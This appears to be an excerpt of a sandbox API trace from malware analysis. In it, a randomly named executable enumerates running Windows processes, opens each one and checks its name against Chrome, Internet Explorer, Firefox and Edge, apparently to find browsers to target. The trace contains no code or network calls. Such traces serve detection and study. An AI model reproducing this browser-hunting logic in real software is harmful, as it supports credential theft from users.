	[0231.588] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0231.589] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x6b00
	[0231.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.590] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0231.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.590] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.590] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0231.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.591] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.591] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0231.592] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6b04
	[0231.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.592] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0231.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.593] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.593] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0231.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.594] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.594] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0231.595] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x6b08
	[0231.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.595] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0231.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.596] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.596] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0231.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.597] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.597] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0231.598] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x6b0c
	[0231.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.598] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0231.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.598] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.599] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0231.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.599] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.599] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0231.600] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x6b10
	[0231.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.600] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0231.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.600] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.601] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0231.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.601] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.602] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0231.603] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6b14
	[0231.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.603] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0231.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.603] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.604] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0231.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.604] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.605] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0231.606] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x6b18
	[0231.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.606] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0231.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.606] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.607] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0231.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.607] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.607] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0231.609] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x6b1c
	[0231.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.609] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0231.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.609] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.610] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0231.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.610] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.610] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.611] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x6b20
	[0231.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.612] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.612] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.613] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.614] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.614] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.615] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6b24
	[0231.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.616] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.616] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.617] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.617] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.617] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.619] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x6b28
	[0231.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.619] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.619] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.620] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.620] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.621] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.622] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x6b2c
	[0231.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.622] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.622] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.623] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.623] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.624] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.625] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x6b30
	[0231.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.625] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.626] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.626] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.627] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.627] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.628] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x6b34
	[0231.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.628] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.629] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.630] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.631] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.631] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.632] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x6b38
	[0231.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.633] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.633] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.634] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.634] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.635] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0231.636] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x6b3c
	[0231.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.636] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0231.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.637] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.638] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0231.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.638] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.639] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.640] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6b40
	[0231.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.640] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.641] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.641] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.642] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.642] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0231.643] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x6b44
	[0231.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.643] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.643] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.644] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.644] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.644] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0231.645] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x6b48
	[0231.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.645] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0231.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.646] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.646] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0231.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.646] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.646] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.647] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x6b4c
	[0231.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.647] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.648] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.648] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.648] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.649] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0231.649] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x6b50
	[0231.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.649] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0231.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.650] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.650] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0231.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.651] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.651] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0231.652] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x6b54
	[0231.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.652] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0231.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.652] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.652] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0231.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.653] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.653] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0231.654] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x6b58
	[0231.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.654] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0231.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.654] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.654] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0231.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.654] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.655] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0231.655] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x6b5c
	[0231.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.655] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0231.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.656] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.656] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0231.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.656] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.657] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0231.657] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0231.657] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0231.658] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x6b60
	[0231.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
